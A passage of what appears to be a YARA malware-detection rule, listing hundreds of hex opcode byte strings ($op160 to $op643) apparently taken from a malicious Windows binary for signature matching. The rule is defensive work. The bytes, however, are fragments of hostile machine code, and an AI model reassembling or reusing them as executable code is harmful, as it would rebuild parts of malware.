0f825affffff5f5e8be55dc3568b7424 } /* Opcode */ $op160 = { 104000c7819c010000a1a04100c78124 } /* Opcode */ $op161 = { 6c244400c78424c8 } /* Opcode */ $op162 = { 542a4400c78424bc } /* Opcode */ $op163 = { 83c414e965020000f645144175158b45 } /* Opcode */ $op164 = { 3d220000c0740732c0e9c8 } /* Opcode */ $op165 = { b4514300c78424a4 } /* Opcode */ $op166 = { b0964300c78424a8 } /* Opcode */ $op167 = { a1d86044005653ff742420ff90d40300 } /* Opcode */ $op168 = { 593974241c742cff742418a1d8604400 } /* Opcode */ $op169 = { 83c41884c00f849f020000ff75100fb7 } /* Opcode */ $op170 = { 8b4f3a8945f88d440104b96462000066 } /* Opcode */ $op171 = { 6e4300c7842428030000086e4300c784 } /* Opcode */ $op172 = { 894da4ff90380100008d45dc8945bc8d } /* Opcode */ $op173 = { a1d860440068c0304300ff7508ff9044 } /* Opcode */ $op174 = { c8974300c7842400010000d8974300c7 } /* Opcode */ $op175 = { a54200c784240801000010a54200c784 } /* Opcode */ $op176 = { 59ff742420a1d86044005653ff906402 } /* Opcode */ $op177 = { 9ce84200c78424f0 } /* Opcode */ $op178 = { 13a24000898180010000c74150645a40 } /* Opcode */ $op179 = { a1d860440053ff7508ff900402000068 } /* Opcode */ $op180 = { 96144100c781b401000026b14000c781 } /* Opcode */ $op181 = { ff7604a1d8604400ff75fc5368d04444 } /* Opcode */ $op182 = { 83c40cff75bcff75bc0fb705e8604400 } /* Opcode */ $op183 = { ff75f8a1d8604400ff7508ff90900100 } /* Opcode */ $op184 = { 8b463aff750c03c78b40100504100000 } /* Opcode */ $op185 = { 8b413c3bc30f84e0 } /* Opcode */ $op186 = { 6810414300ff75b8a1d8604400ff9020 } /* Opcode */ $op187 = { c0974300c78424fc } /* Opcode */ $op188 = { 6a418d45d05f8945f8c745f020 } /* Opcode */ $op189 = { 80751583780800740fa1d86044005756 } /* Opcode */ $op190 = { 80974300c78424e0 } /* Opcode */ $op191 = { 984300c78424100100000c984300c784 } /* Opcode */ $op192 = { 184300c784247c0200000c184300c784 } /* Opcode */ $op193 = { 6898404300ff75b8a1d8604400ff9020 } /* Opcode */ $op194 = { 03c02b45c8590345f883e0fe83f80c75 } /* Opcode */ $op195 = { 8bd8595985db0f848d } /* Opcode */ $op196 = { 83c42085ff750583c8ffeb258b463a8d } /* Opcode */ $op197 = { c8534300c78424f4 } /* Opcode */ $op198 = { a1d8604400687822440056ff90f0 } /* Opcode */ $op199 = { 83c4145e32c05bc9c3558bec83ec24a1 } /* Opcode */ $op200 = { 83c40ceb65e82ac200003d0d0000c0e9 } /* Opcode */ $op201 = { 68682c430050a1d860440057ff902c03 } /* Opcode */ $op202 = { 04e74200c7842494 } /* Opcode */ $op203 = { 83c430ff45f847ff4df00f855affffff } /* Opcode */ $op204 = { a1d860440068eccd430053ff90200300 } /* Opcode */ $op205 = { 8364241800c70500a04200222700008b } /* Opcode */ $op206 = { 8ca34200c78424a0 } /* Opcode */ $op207 = { 685c2b430050a1d860440053ff902c03 } /* Opcode */ $op208 = { 8bf08d45f850a1d8604400ff90b80300 } /* Opcode */ $op209 = { a1d8604400684846440057ff50405959 } /* Opcode */ $op210 = { 598d44245050a1d8604400ff90e00300 } /* Opcode */ $op211 = { ff75148b45fc83c00450ff750ca1d860 } /* Opcode */ $op212 = { 8975b88975bcff90a803000085c00f85 } /* Opcode */ $op213 = { a1d8604400ff742434681069430056ff } /* Opcode */ $op214 = { 83c4148945f8ff75ecff7508a1d86044 } /* Opcode */ $op215 = { 0c254400c78424f8 } /* Opcode */ $op216 = { 80de4200c78424f4 } /* Opcode */ $op217 = { a1d8604400536800080000ff7508ff90 } /* Opcode */ $op218 = { 895de0895de4ff901404000089450c3d } /* Opcode */ $op219 = { 8b4f3a8b55f88365fc008945f40500f0 } /* Opcode */ $op220 = { 154300c78424b401000010154300c784 } /* Opcode */ $op221 = { 1b4400c7842498020000181b4400c784 } /* Opcode */ $op222 = { 83c41084c00f85030c0000a1d8604400 } /* Opcode */ $op223 = { 83c0083bc30f84ab } /* Opcode */ $op224 = { 342c4400c7842400010000442c4400c7 } /* Opcode */ $op225 = { 83c4188d45f050a1d8604400ff90f8 } /* Opcode */ $op226 = { ff4424148d474450a1d8604400ff9008 } /* Opcode */ $op227 = { a1d860440068b42e43005653ff903002 } /* Opcode */ $op228 = { 9c524300c78424d0 } /* Opcode */ $op229 = { b8a0604400bf34a042002bc78945e40f } /* Opcode */ $op230 = { 5c014300c78424bc } /* Opcode */ $op231 = { 83c41485c0740cc7461002 } /* Opcode */ $op232 = { 837d0c007505e990 } /* Opcode */ $op233 = { 14e74200c7842498 } /* Opcode */ $op234 = { f11c4100c7812c020000b31f4100c781 } /* Opcode */ $op235 = { a1d860440056ff750cff9098 } /* Opcode */ $op236 = { 83c40cff75fcff7508a1d8604400ff90 } /* Opcode */ $op237 = { 83c40cff75fcff7508a1d8604400ff90 } /* Opcode */ $op238 = { 83c40cff75fcff7508a1d8604400ff90 } /* Opcode */ $op239 = { 0c294400c784248c } /* Opcode */ $op240 = { 40974300c78424cc } /* Opcode */ $op241 = { 6e1a4100c78164010000cbc74000c781 } /* Opcode */ $op242 = { d82a4400c78424cc } /* Opcode */ $op243 = { 64244400c78424c4 } /* Opcode */ $op244 = { 83c4188945fc837dfc00746c8b45fc81 } /* Opcode */ $op245 = { 8975d8894ddc8975e48975e8ff901404 } /* Opcode */ $op246 = { 03c02b45cc590345f883e0fe83f80874 } /* Opcode */ $op247 = { ec2b4400c78424f4 } /* Opcode */ $op248 = { 50a1d8604400ff90a402000083c418a1 } /* Opcode */ $op249 = { 6f4300c78424640300000c6f4300c784 } /* Opcode */ $op250 = { 8b750c8b50048b4f3a83c40c8945d089 } /* Opcode */ $op251 = { 7ca44200c78424e0 } /* Opcode */ $op252 = { 8b45fc0fb7400483f8250f85d9 } /* Opcode */ $op253 = { 7ce74200c78424b0 } /* Opcode */ $op254 = { 8975e88975ecff90800300005f8b45fc } /* Opcode */ $op255 = { 8945f08d45d050a1d8604400ff90b803 } /* Opcode */ $op256 = { e4234400c784248c } /* Opcode */ $op257 = { 5c124300c78424fc } /* Opcode */ $op258 = { ff7604a1d8604400ff75fc53688c4444 } /* Opcode */ $op259 = { cce84200c78424fc } /* Opcode */ $op260 = { 83c40c8d5c4302a1d860440057ff9098 } /* Opcode */ $op261 = { f4a34200c78424b4 } /* Opcode */ $op262 = { 83c4148945fcff75f8ff7508a1d86044 } /* Opcode */ $op263 = { 83c4188364240c00c7442438a8124400 } /* Opcode */ $op264 = { 1641008b151c9042008991180400008b } /* Opcode */ $op265 = { bc2b4400c78424e8 } /* Opcode */ $op266 = { ec104300c7842498 } /* Opcode */ $op267 = { 5768304c440068584c440056ff5024a1 } /* Opcode */ $op268 = { 68e8414300ff75b8a1d8604400ff9020 } /* Opcode */ $op269 = { cca44200c78424fc } /* Opcode */ $op270 = { 50244400c78424bc } /* Opcode */ $op271 = { 8f4300c78424780c0000108f4300c784 } /* Opcode */ $op272 = { 5903c0508d8500feffff5068c0694300 } /* Opcode */ $op273 = { 0faf459c8d7008a1d860440056ff750c } /* Opcode */ $op274 = { ec534300c7842400010000fc534300c7 } /* Opcode */ $op275 = { 56ff75088ad8a1d8604400ff90900100 } /* Opcode */ $op276 = { 663bd8740a46460fb7066685c075d333 } /* Opcode */ $op277 = { 83c4145f5e5b8be55dc3cccccccccccc } /* Opcode */ $op278 = { a1d8604400682c46440057ff50405959 } /* Opcode */ $op279 = { c8014300c78424dc } /* Opcode */ $op280 = { a82a4400c78424c4 } /* Opcode */ $op281 = { a1d86044006814ce430053ff90200300 } /* Opcode */ $op282 = { 402a4400c78424b8 } /* Opcode */ $op283 = { 98e74200c78424b4 } /* Opcode */ $op284 = { 395814eb34a1d860440057ff75f456ff } /* Opcode */ $op285 = { 6c114300c78424bc } /* Opcode */ $op286 = { 57ff751056ff90b8 } /* Opcode */ $op287 = { 684c454300ff7588a1d8604400ff9020 } /* Opcode */ $op288 = { 8b4dfc8d044150ff7514b8001000002b } /* Opcode */ $op289 = { ec244400c78424f0 } /* Opcode */ $op290 = { 60524300c78424c0 } /* Opcode */ $op291 = { a1d860440068002a430057ff90c40300 } /* Opcode */ $op292 = { 48964300c784248c } /* Opcode */ $op293 = { 33f6803dc360440000751aa1d8604400 } /* Opcode */ $op294 = { 54e84200c78424dc } /* Opcode */ $op295 = { a1d860440056536a0468f8904200ff90 } /* Opcode */ $op296 = { 558bec83e4f881ec8c } /* Opcode */ $op297 = { 8b45f483c00450ff7508a1d8604400ff } /* Opcode */ $op298 = { 64de4200c78424f0 } /* Opcode */ $op299 = { c78120040000ba4241008b15b8904200 } /* Opcode */ $op300 = { 8b46048b0dcc6044008988b4 } /* Opcode */ $op301 = { 6860f24300ff75fcff91500300008b0d } /* Opcode */ $op302 = { 894300c78424b40a00000c894300c784 } /* Opcode */ $op303 = { 684c444300ff7588a1d8604400ff9020 } /* Opcode */ $op304 = { a1d86044005653ff742418ff90d40300 } /* Opcode */ $op305 = { 895dd4897ddc895de0895de4ff901404 } /* Opcode */ $op306 = { 1c244400c78424a8 } /* Opcode */ $op307 = { 6864444300ff7588a1d8604400ff9020 } /* Opcode */ $op308 = { 24014300c78424b4 } /* Opcode */ $op309 = { a1d860440068accd4300ff75f8ff9020 } /* Opcode */ $op310 = { 48004300c7842484 } /* Opcode */ $op311 = { c0dd4200c78424c8 } /* Opcode */ $op312 = { 83c41c803de260440000742cff750ca1 } /* Opcode */ $op313 = { 8b45f88038030f858d } /* Opcode */ $op314 = { 0c124300c78424e8 } /* Opcode */ $op315 = { 18024300c78424f8 } /* Opcode */ $op316 = { 59b001c9c38b4c24048b513a33c033c9 } /* Opcode */ $op317 = { 78974300c78424dc } /* Opcode */ $op318 = { 8c014300c78424cc } /* Opcode */ $op319 = { 5959837df400750cc605c160440000e9 } /* Opcode */ $op320 = { 508d44245450a1d8604400c744245818 } /* Opcode */ $op321 = { 084300c784243002000010084300c784 } /* Opcode */ $op322 = { b4114300c78424d0 } /* Opcode */ $op323 = { 70964300c7842494 } /* Opcode */ $op324 = { d0964300c78424b0 } /* Opcode */ $op325 = { 28124300c78424f0 } /* Opcode */ $op326 = { 895c2464895c2468ff90140400003d22 } /* Opcode */ $op327 = { 5933c03bfb0f94c05f5e5bc9c3cccccc } /* Opcode */ $op328 = { c9c3558bec83ec3c6a0f8d45c450ff75 } /* Opcode */ $op329 = { 5c294400c7842498 } /* Opcode */ $op330 = { ff75106a00ff750ca1d8604400ff90b8 } /* Opcode */ $op331 = { ff75106a00ff750ca1d8604400ff90b8 } /* Opcode */ $op332 = { 59b0015f5e5bc9c3558bec8b450c85c0 } /* Opcode */ $op333 = { 20e74200c784249c } /* Opcode */ $op334 = { 8975dc8975e08975f4ff90800300008b } /* Opcode */ $op335 = { e4dc4200c784248c } /* Opcode */ $op336 = { a1d860440056ff90fc020000a1d86044 } /* Opcode */ $op337 = { a1d860440068f045440057ff50405959 } /* Opcode */ $op338 = { 595f5ec9c3558bec83ec70535733db33 } /* Opcode */ $op339 = { 204400c78424cc03000018204400c784 } /* Opcode */ $op340 = { 895dcc894dd0895dd8895ddcff901404 } /* Opcode */ $op341 = { 8d7c47028d4702593b450c729f43438b } /* Opcode */ $op342 = { 8a45ff595bc9c3cc558bec83e4f881ec } /* Opcode */ $op343 = { 8b46048b0dc86044008988c4 } /* Opcode */ $op344 = { 598d45ec50a1d8604400ff90f8 } /* Opcode */ $op345 = { 854300c784249809000014854300c784 } /* Opcode */ $op346 = { 8b463a0345fc50a1d8604400ff907802 } /* Opcode */ $op347 = { 8d44242450ff74241ca1d8604400ff90 } /* Opcode */ $op348 = { 30244400c78424b0 } /* Opcode */ $op349 = { 70004300c7842490 } /* Opcode */ $op350 = { 08244400c784249c } /* Opcode */ $op351 = { 1c124300c78424ec } /* Opcode */ $op352 = { 8b45fc8338040f8ee9 } /* Opcode */ $op353 = { f02a4400c78424d0 } /* Opcode */ $op354 = { b0974300c78424f8 } /* Opcode */ $op355 = { 9cdd4200c78424bc } /* Opcode */ $op356 = { a0974300c78424f0 } /* Opcode */ $op357 = { 598d45f4505656568d45cc50683f000f } /* Opcode */ $op358 = { d8dd4200c78424d0 } /* Opcode */ $op359 = { 59ff75f88b7d08a1d860440057ff9090 } /* Opcode */ $op360 = { a1d86044006880fd420057ff90f0 } /* Opcode */ $op361 = { 83c440ff75eca1d8604400576840b043 } /* Opcode */ $op362 = { cc234400c7842484 } /* Opcode */ $op363 = { 595056ff17a1d860440083c40c684853 } /* Opcode */ $op364 = { 83c40c8b45f85e5f5bc9c38b54240456 } /* Opcode */ $op365 = { 3cde4200c78424e8 } /* Opcode */ $op366 = { 60a44200c78424d8 } /* Opcode */ $op367 = { 668b4d0a663bc874c7464666833e000f } /* Opcode */ $op368 = { 5959837dfc0074206880 } /* Opcode */ $op369 = { 668bd80fb70750a1d8604400ff90e8 } /* Opcode */ $op370 = { 668bd80fb70750a1d8604400ff90e8 } /* Opcode */ $op371 = { fcb04000c78100010000a6c84000c781 } /* Opcode */ $op372 = { 44e74200c78424a4 } /* Opcode */ $op373 = { 83c428ff742418a1d86044005653ff90 } /* Opcode */ $op374 = { f8294400c78424ac } /* Opcode */ $op375 = { 78114300c78424c0 } /* Opcode */ $op376 = { 59ff75f8a1d8604400ff7508ff909001 } /* Opcode */ $op377 = { 59ff75f8a1d8604400ff7508ff909001 } /* Opcode */ $op378 = { 59ff442410837c2410040f825affffff } /* Opcode */ $op379 = { 8d45ec50ff75fca1d8604400ff9090 } /* Opcode */ $op380 = { ff45f88d474450a1d8604400ff900804 } /* Opcode */ $op381 = { ff45f88d474450a1d8604400ff900804 } /* Opcode */ $op382 = { 44a44200c78424d0 } /* Opcode */ $op383 = { a1d8604400538b5d08565768feff0000 } /* Opcode */ $op384 = { 08014300c78424ac } /* Opcode */ $op385 = { 8d47fc50a1d860440053ff504c83c424 } /* Opcode */ $op386 = { bce74200c78424c0 } /* Opcode */ $op387 = { 83c410eb098d430881ce } /* Opcode */ $op388 = { ff74241ca1d8604400ff7508ff909001 } /* Opcode */ $op389 = { 8975d88975e48975e8ff901404000053 } /* Opcode */ $op390 = { 8945088b45c083c41085c0740d8b4f3a } /* Opcode */ $op391 = { c4de4200c7842400010000e0de4200c7 } /* Opcode */ $op392 = { 83c41885f6750732c05f5e5bc9c38d46 } /* Opcode */ $op393 = { 44294400c7842494 } /* Opcode */ $op394 = { b0a44200c78424f4 } /* Opcode */ $op395 = { ff90380100008d44242c894424588d84 } /* Opcode */ $op396 = { ac004300c784249c } /* Opcode */ $op397 = { ff7604a1d8604400ff75fc53689c4444 } /* Opcode */ $op398 = { b0104300c7842488 } /* Opcode */ $op399 = { d8594000c78148030000fd2b4100c781 } /* Opcode */ $op400 = { dca44200c7842400010000eca44200c7 } /* Opcode */ $op401 = { 74a44200c78424dc } /* Opcode */ $op402 = { ff901404000085c0a1d86044007412ff } /* Opcode */ $op403 = { 21ab4000c74134e3384100c7417c832b } /* Opcode */ $op404 = { 895c2440895c2444ff90240400005959 } /* Opcode */ $op405 = { a0a44200c78424f0 } /* Opcode */ $op406 = { 80964300c784249c } /* Opcode */ $op407 = { 10244400c78424a0 } /* Opcode */ $op408 = { 72b3ff75f8a1d8604400ff7508ff9090 } /* Opcode */ $op409 = { ace84200c78424f4 } /* Opcode */ $op410 = { 578b7d088d45fe508b450cff34b0a1d8 } /* Opcode */ $op411 = { 764300c784244805000010764300c784 } /* Opcode */ $op412 = { 8975e48975e8ff90140400003d220000 } /* Opcode */ $op413 = { 817c2410102700000f8fd8 } /* Opcode */ $op414 = { 804300c784242008000008804300c784 } /* Opcode */ $op415 = { 6884444300ff7588a1d8604400ff9020 } /* Opcode */ $op416 = { a8dd4200c78424c0 } /* Opcode */ $op417 = { 78964300c7842498 } /* Opcode */ $op418 = { 598d44000250566a026a008d45f050ff } /* Opcode */ $op419 = { 83c40c834b0c048b075e5b5fc9c3558b } /* Opcode */ $op420 = { 174400c784249801000014174400c784 } /* Opcode */ $op421 = { e8004300c78424a4 } /* Opcode */ $op422 = { d4114300c78424d8 } /* Opcode */ $op423 = { 56ff75148bf8a1d8604400ff90900100 } /* Opcode */ $op424 = { e0514300c78424ac } /* Opcode */ $op425 = { 08a44200c78424b8 } /* Opcode */ $op426 = { 5959c605c1604400005fc9c3837c2408 } /* Opcode */ $op427 = { 80104300c7842484 } /* Opcode */ $op428 = { 8bf803ff8d471450ff7514a1d8604400 } /* Opcode */ $op429 = { e9adfeffffa1d860440053576850a042 } /* Opcode */ $op430 = { 83c4148bc65ec3558bec83ec7033c056 } /* Opcode */ $op431 = { a1d8604400ff0500a04200536a0356ff } /* Opcode */ $op432 = { 897dc4897dc8ff905001000085c00f85 } /* Opcode */ $op433 = { 5733ff397d7c0f84ea010000a1d86044 } /* Opcode */ $op434 = { 94244400c78424d4 } /* Opcode */ $op435 = { 3d230000c0740b3d050000800f85df } /* Opcode */ $op436 = { 68e4404300ff75b8a1d8604400ff9020 } /* Opcode */ $op437 = { a1d8604400681846440057ff50405959 } /* Opcode */ $op438 = { 5150a1d8604400ff9004020000595981 } /* Opcode */ $op439 = { 598ac3ebaab301ebe8568b7424088b46 } /* Opcode */ $op440 = { 6868454300ff7588a1d8604400ff9020 } /* Opcode */ $op441 = { a1949042008981b0030000a170904200 } /* Opcode */ $op442 = { a8974300c78424f4 } /* Opcode */ $op443 = { 595056ff1783c40ca1d860440056ff90 } /* Opcode */ $op444 = { 8d44240c50a1d8604400ff90f8 } /* Opcode */ $op445 = { 8d44240c50a1d8604400ff90f8 } /* Opcode */ $op446 = { 33db3bc30f84f30100008b40103bc30f } /* Opcode */ $op447 = { 568d441b0250ff7514a1d8604400ff90 } /* Opcode */ $op448 = { 98974300c78424ec } /* Opcode */ $op449 = { 83c430833d0461440005751ba1d86044 } /* Opcode */ $op450 = { 204300c78424d804000010204300c784 } /* Opcode */ $op451 = { 8b48103bcb0f84eb } /* Opcode */ $op452 = { 934300c78424840d000004934300c784 } /* Opcode */ $op453 = { 593bf37415e943ffffff8d450c50a1d8 } /* Opcode */ $op454 = { 24514300c784248c } /* Opcode */ $op455 = { 1c2c4400c78424fc } /* Opcode */ $op456 = { 83c41885c0740cc7461001 } /* Opcode */ $op457 = { 598bc65f5ec9c3558bec51a1d8604400 } /* Opcode */ $op458 = { 83c40c6a0a83c71057568d45ec50ff75 } /* Opcode */ $op459 = { ff4424108d474450a1d8604400ff9008 } /* Opcode */ $op460 = { 8b45fc8b008d44000250ff7508a1d860 } /* Opcode */ $op461 = { 6a01ff75acff75f46a00ff750ca1d860 } /* Opcode */ $op462 = { 8974247489742478ff901404000085c0 } /* Opcode */ $op463 = { 8974247489742478ff901404000085c0 } /* Opcode */ $op464 = { e4964300c78424b8 } /* Opcode */ $op465 = { 8bd883c41885db0f840c010000a1d860 } /* Opcode */ $op466 = { 3b0508614400751b8b4604ff80b8 } /* Opcode */ $op467 = { 194300c78424c40200000c194300c784 } /* Opcode */ $op468 = { d0514300c78424a8 } /* Opcode */ $op469 = { 48514300c7842494 } /* Opcode */ $op470 = { c8114300c78424d4 } /* Opcode */ $op471 = { ff75f4a1d860440068c843440056ff75 } /* Opcode */ $op472 = { f4514300c78424b0 } /* Opcode */ $op473 = { 50a1d860440051ff9004020000836508 } /* Opcode */ $op474 = { 164400c784244c0100000c164400c784 } /* Opcode */ $op475 = { 83c4188d44242050a1d8604400ff90b8 } /* Opcode */ $op476 = { 54a44200c78424d4 } /* Opcode */ $op477 = { a4e74200c78424b8 } /* Opcode */ $op478 = { a1d860440068e829430057ff90c40300 } /* Opcode */ $op479 = { a1d8604400682012440056ff90f0 } /* Opcode */ $op480 = { a1d860440068202a430057ff90c40300 } /* Opcode */ $op481 = { 6c534300c78424e8 } /* Opcode */ $op482 = { 59a1d860440053ff7508ff9090010000 } /* Opcode */ $op483 = { 59ff442414817c2414af0100000f8276 } /* Opcode */ $op484 = { 2c974300c78424c8 } /* Opcode */ $op485 = { c7430c20020000895df0ff90c0030000 } /* Opcode */ $op486 = { a138904200898160020000a1c0904200 } /* Opcode */ $op487 = { 593bfe7415a1d860440053ff7508ff90 } /* Opcode */ $op488 = { 83c40c5f8ac35ee9e7feffff558bec53 } /* Opcode */ $op489 = { d0dc4200c7842484 } /* Opcode */ $op490 = { ff90a8030000f7d81bc0f7d02345fc5f } /* Opcode */ $op491 = { 80004300c7842494 } /* Opcode */ $op492 = { 5150a1d8604400ff9004020000836508 } /* Opcode */ $op493 = { 5933c03bfe5f5e0f94c05bc9c3558bec } /* Opcode */ $op494 = { 3935046144000f859b } /* Opcode */ $op495 = { 83c40c32c0ebdb837c240400750333c0 } /* Opcode */ $op496 = { 68802c4300ff75f057ff902c03000083 } /* Opcode */ $op497 = { 8b4f08988d048504 } /* Opcode */ $op498 = { 98a44200c78424ec } /* Opcode */ $op499 = { ac244400c78424dc } /* Opcode */ $op500 = { 30e74200c78424a0 } /* Opcode */ $op501 = { 895db0895db4ff9014040000bf340000 } /* Opcode */ $op502 = { 5933c0395d0c5f5e0f94c05bc9c3558b } /* Opcode */ $op503 = { 5933c0395d0c5f5e0f94c05bc9c3558b } /* Opcode */ $op504 = { 83c40c5656566a016a0753568d45f450 } /* Opcode */ $op505 = { 83c40c5656566a016a0753568d45f450 } /* Opcode */ $op506 = { 84294400c78424a0 } /* Opcode */ $op507 = { a1d8604400566800100000ff7508ff90 } /* Opcode */ $op508 = { 874300c78424280a00000c874300c784 } /* Opcode */ $op509 = { 59a1d860440056ff903c020000a1d860 } /* Opcode */ $op510 = { 33c0668944242c8d7c242eab66ab6840 } /* Opcode */ $op511 = { 702b4400c78424e0 } /* Opcode */ $op512 = { 598ac3ebaab301ebe8558bec83ec4456 } /* Opcode */ $op513 = { e0104300c7842494 } /* Opcode */ $op514 = { 83c40c5f5e5bc9c3cccc558bec83ec20 } /* Opcode */ $op515 = { 83c41cebc333c08b4c24043b88089242 } /* Opcode */ $op516 = { ff0500a04200381dea604400740da1d8 } /* Opcode */ $op517 = { 64004300c784248c } /* Opcode */ $op518 = { 60114300c78424b8 } /* Opcode */ $op519 = { 895ddc895de0ff901404000085c00f85 } /* Opcode */ $op520 = { 895ddc895de0ff901404000085c00f85 } /* Opcode */ $op521 = { b8244400c78424e0 } /* Opcode */ $op522 = { 895c2464895c2468ff901404000085c0 } /* Opcode */ $op523 = { ff742414a1d8604400ff742414ff9000 } /* Opcode */ $op524 = { c4104300c784248c } /* Opcode */ $op525 = { 5f85c0740633c033d2c9c38b45e88b55 } /* Opcode */ $op526 = { 90974300c78424e8 } /* Opcode */ $op527 = { 4c274100c781a403000087094100c781 } /* Opcode */ $op528 = { 88e84200c78424ec } /* Opcode */ $op529 = { 5983f8027669a1d86044005368feff00 } /* Opcode */ $op530 = { 83c41889458c837d8c000f8407040000 } /* Opcode */ $op531 = { a1d86044008d5e0c6828c6430053ff90 } /* Opcode */ $op532 = { ff7508a1d8604400ff7308ff90ac0300 } /* Opcode */ $op533 = { 66837938020f86d5 } /* Opcode */ $op534 = { 94dd4200c78424b8 } /* Opcode */ $op535 = { 83c414c60437008bc75f5ec3568b7424 } /* Opcode */ $op536 = { 83c40c3bfb0f94c05e5f5bc9c3558bec } /* Opcode */ $op537 = { a1d86044005657beff7f000056ff7508 } /* Opcode */ $op538 = { a1d86044005657beff7f000056ff7508 } /* Opcode */ $op539 = { 68a4454300ff7588a1d8604400ff9020 } /* Opcode */ $op540 = { 0f8260ffffffa1d86044006820214400 } /* Opcode */ $op541 = { 8b45fc8d048603433a50a1d8604400ff } /* Opcode */ $op542 = { 84244400c78424d0 } /* Opcode */ $op543 = { f0114300c78424e0 } /* Opcode */ $op544 = { 0c974300c78424c0 } /* Opcode */ $op545 = { 282a4400c78424b4 } /* Opcode */ $op546 = { 83c8ffe95c010000836508008d450850 } /* Opcode */ $op547 = { 7c524300c78424c8 } /* Opcode */ $op548 = { 34524300c78424bc } /* Opcode */ $op549 = { d8e64200c784248c } /* Opcode */ $op550 = { 98114300c78424c8 } /* Opcode */ $op551 = { 68b8404300ff75b8a1d8604400ff9020 } /* Opcode */ $op552 = { 7ce84200c78424e8 } /* Opcode */ $op553 = { 8b0dd8604400536689450aff91e8 } /* Opcode */ $op554 = { 598d44000250ff75108d45f46a026a00 } /* Opcode */ $op555 = { 598d44000250ff75108d45f46a026a00 } /* Opcode */ $op556 = { 20de4200c78424e0 } /* Opcode */ $op557 = { 59803de2604400007443a1d860440057 } /* Opcode */ $op558 = { 8b45088b50183bca0f82270100008b40 } /* Opcode */ $op559 = { 83c41ca1d860440053ff7508ff909001 } /* Opcode */ $op560 = { 1c014300c78424b0 } /* Opcode */ $op561 = { e986feffffa1d86044005357685ca042 } /* Opcode */ $op562 = { d4534300c78424f8 } /* Opcode */ $op563 = { 0ca34200c7842488 } /* Opcode */ $op564 = { 8b7d0ceb2550a1d8604400ff90e8 } /* Opcode */ $op565 = { 8b5dfc3bde75053975f4747b33c03bde } /* Opcode */ $op566 = { 598d4400028945f4ff7508a1d8604400 } /* Opcode */ $op567 = { 8b48048945f8b80010000083c40c3945 } /* Opcode */ $op568 = { ff750c50a1d8604400ff90c403000059 } /* Opcode */ $op569 = { 817c2414102700000f8fcc } /* Opcode */ $op570 = { ff75e8a1d8604400ff75ecff7508ff50 } /* Opcode */ $op571 = { a1a890420089818c020000a1dc904200 } /* Opcode */ $op572 = { 24a34200c784248c } /* Opcode */ $op573 = { 28524300c78424b8 } /* Opcode */ $op574 = { 84514300c784249c } /* Opcode */ $op575 = { a1d860440033db536838234400685823 } /* Opcode */ $op576 = { 34114300c78424ac } /* Opcode */ $op577 = { f0dc4200c7842490 } /* Opcode */ $op578 = { 6888454300ff7588a1d8604400ff9020 } /* Opcode */ $op579 = { 8b44242483c00450ff7508e830bfffff } /* Opcode */ $op580 = { 83c41803c050ff75ec8b45e853ff1050 } /* Opcode */ $op581 = { ff90480200005f85c0740432c0c9c38b } /* Opcode */ $op582 = { ff90a00300008bf08d45fc50a1d86044 } /* Opcode */ $op583 = { 59a1d86044006a0468dcb3430068e8b3 } /* Opcode */ $op584 = { 5c974300c78424d4 } /* Opcode */ $op585 = { 70014300c78424c0 } /* Opcode */ $op586 = { 6a228d45ec50ff757ca1d8604400c745 } /* Opcode */ $op587 = { 8b55fc8b4f3a0500f0ffff83c410ff45 } /* Opcode */ $op588 = { d8294400c78424a8 } /* Opcode */ $op589 = { c7812801000020ca4000c78118030000 } /* Opcode */ $op590 = { 83c40c8d45dc5068000104008d45fc50 } /* Opcode */ $op591 = { e4e74200c78424c8 } /* Opcode */ $op592 = { 895de0895de4ff90140400008bf881ff } /* Opcode */ $op593 = { 595985c075e38b45e08946288b4608ff } /* Opcode */ $op594 = { a1d860440083c448ff7604ff75fc5368 } /* Opcode */ $op595 = { dc964300c78424b4 } /* Opcode */ $op596 = { 6848f24300ff75fcff91500300008b0d } /* Opcode */ $op597 = { 515350a1d860440057ff90700100008b } /* Opcode */ $op598 = { b8e84200c78424f8 } /* Opcode */ $op599 = { 14a44200c78424bc } /* Opcode */ $op600 = { 689c444300ff7588a1d8604400ff9020 } /* Opcode */ $op601 = { 7e4300c7842484070000087e4300c784 } /* Opcode */ $op602 = { 3c964300c7842488 } /* Opcode */ $op603 = { 94de4200c78424f8 } /* Opcode */ $op604 = { 50a1d86044005356ff900c040000ff75 } /* Opcode */ $op605 = { 3e834100c781400100006a664100c781 } /* Opcode */ $op606 = { 60e84200c78424e0 } /* Opcode */ $op607 = { 79fe4000a104904200898100030000c7 } /* Opcode */ $op608 = { 7ca34200c784249c } /* Opcode */ $op609 = { ff90140400003d220000c075408d4424 } /* Opcode */ $op610 = { 68974300c78424d8 } /* Opcode */ $op611 = { 58244400c78424c0 } /* Opcode */ $op612 = { 83c410a1d86044005756ff74241cff90 } /* Opcode */ $op613 = { 83c428ff74240ca1d86044005653ff90 } /* Opcode */ $op614 = { a1d860440068c821440056ff90f0 } /* Opcode */ $op615 = { 8975e48975e88975fcff901404000085 } /* Opcode */ $op616 = { 68ac414300ff75b8a1d8604400ff9020 } /* Opcode */ $op617 = { 50a1d8604400ff900403000084c0a1d8 } /* Opcode */ $op618 = { ff902404000059598d45e050a1d86044 } /* Opcode */ $op619 = { 8975ec8975f0ff90a80300005f5e85c0 } /* Opcode */ $op620 = { 8975ec8975f0ff90a80300005f5e85c0 } /* Opcode */ $op621 = { 83c41485c0740cc7461003 } /* Opcode */ $op622 = { 85c0740583c8ffeb088b45e889461433 } /* Opcode */ $op623 = { 50dd4200c78424a4 } /* Opcode */ $op624 = { 895dbc895dfcff90800300003bc30f84 } /* Opcode */ $op625 = { c4524300c78424d4 } /* Opcode */ $op626 = { f8504300c7842484 } /* Opcode */ $op627 = { c0e64200c7842484 } /* Opcode */ $op628 = { a4014300c78424d4 } /* Opcode */ $op629 = { b4e74200c78424bc } /* Opcode */ $op630 = { a1d860440057ff7508ff90900100008b } /* Opcode */ $op631 = { 33ff83c4103bc7743b8b5b3a8b4d0c03 } /* Opcode */ $op632 = { a19c904200c781000200008d9d4100c7 } /* Opcode */ $op633 = { 68a84000c7812c0400008a5b4100c781 } /* Opcode */ $op634 = { 6a06bf10f3430057894df0ff90400200 } /* Opcode */ $op635 = { fc244400c78424f4 } /* Opcode */ $op636 = { 5959837df8007505e982 } /* Opcode */ $op637 = { 082b4400c78424d4 } /* Opcode */ $op638 = { 33c03bfb590f94c05f5e5bc9c3558bec } /* Opcode */ $op639 = { a8a34200c78424a4 } /* Opcode */ $op640 = { 08de4200c78424dc } /* Opcode */ $op641 = { 28dd4200c784249c } /* Opcode */ $op642 = { d4244400c78424e8 } /* Opcode */ $op643 